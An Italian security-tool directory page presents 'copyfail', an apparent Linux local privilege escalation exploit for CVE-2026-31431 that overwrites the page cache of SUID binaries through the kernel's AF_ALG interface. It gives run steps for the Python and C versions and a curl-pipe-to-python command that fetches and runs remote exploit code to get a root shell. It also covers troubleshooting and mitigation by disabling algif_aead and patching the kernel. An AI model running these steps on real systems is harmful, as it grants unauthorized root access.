Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
copyfail — Exploit locale per l'escalation di privilegi su Linux per CVE-2026-31431, che sovrascrive la page cache dei binari SUID tramite l'API crittografica del kernel AF_ALG per ottenere l'accesso root. | Kitploit
Strumenti/GitHubGitHub/minime794/copyfail
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitBinary Exploitation
GitHubminime794/copyfail

copyfail

Exploit locale per l'escalation di privilegi su Linux per CVE-2026-31431, che sovrascrive la page cache dei binari SUID tramite l'API crittografica del kernel AF_ALG per ottenere l'accesso root.

Vedi Repository
6h 40m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Copy Fail (CVE-2026-31431) – Guida all'utilizzo dell'exploit

Readme originale preso da @painoob

Tutte le versioni del Kernel dal 2017 / 2016 sono vulnerabili ! Il Kernel 7 è completamente immune, gli altri (tra 5-7 potrebbero essere ancora vulnerabili)

⚠️ Disclaimer

Questo contenuto è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. NON eseguirlo su sistemi senza esplicita autorizzazione.


📌 Panoramica

Copy Fail (CVE-2026-31431) è una vulnerabilità di Local Privilege Escalation (LPE) su Linux che colpisce l'API crypto del kernel tramite AF_ALG.

Consente a un utente non privilegiato di sovrascrivere i dati della page cache di un binario SUID (ad esempio, /usr/bin/su) e ottenere l'accesso root.


🧠 Requisiti

Requisiti di sistema

  • Kernel Linux (vulnerabile – dipende dallo stato della patch)
  • AF_ALG abilitato
  • Modulo algif_aead caricato

Requisiti dell'exploit Python

  • Python 3.10+
  • Supporto per:
    • os.splice
    • socket(AF_ALG)

🔍 Verifica della vulnerabilità

root@kitploit:~
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

Indicatori attesi:

  • authencesn(hmac(sha256),cbc(aes))
  • algif_aead caricato

🐍 Esecuzione dell'exploit Python

1. Esecuzione diretta

root@kitploit:~
python3 copy_fail_exp.py

2. Oppure tramite curl (se ospitato remotamente)

root@kitploit:~
curl https://copy.fail/exp | python3

3. Attivazione della shell root

root@kitploit:~
su
id

Risultato atteso:

root@kitploit:~
uid=0(root)

⚠️ Problemi comuni (Python)

❌ Errore: os.splice not found

Causa:

  • Versione di Python < 3.10
  • Build limitata

Soluzione:

  • Usare un binario Python più recente
  • Caricare un interprete Python statico

⚙️ Compilazione della versione C

1. Compilazione

root@kitploit:~
gcc copy_fail_exp.c -o copy_fail

2. Rendere eseguibile

root@kitploit:~
chmod +x copy_fail

3. Esecuzione dell'exploit

root@kitploit:~
./copy_fail
su

⚠️ Problemi comuni (C)

❌ L'exploit viene eseguito ma non si ottiene root

Possibili cause:

  • Kernel già patchato
  • Offset errati
  • Ambiente non compatibile

❌ Errori di compilazione

Installare gli strumenti necessari:

root@kitploit:~
apt update && apt install build-essential

🧪 Risoluzione dei problemi

Verificare se il sistema è patchato

root@kitploit:~
dmesg | grep -i alg

Verificare il modulo

root@kitploit:~
lsmod | grep algif_aead

🛡️ Mitigazione

Disabilitare il modulo vulnerabile

root@kitploit:~
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

Applicare la patch del kernel

Aggiornare il sistema:

root@kitploit:~
apt update && apt upgrade

📌 Note

  • L'exploit modifica solo la page cache (non persistente)
  • Richiede accesso locale
  • Non sfruttabile da remoto per impostazione predefinita

🧠 Considerazioni finali

Se l'exploit fallisce, considerare:

  • Kernel già patchato
  • Restrizioni dell'ambiente
  • Vettori alternativi di privilege escalation (SUID, capabilities, misconfigurazione di sudo)

📚 Riferimenti

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 Note dell'autore

Usa questo exploit in modo responsabile solo in laboratori, CTF e pentest autorizzati.

Scarica lo strumento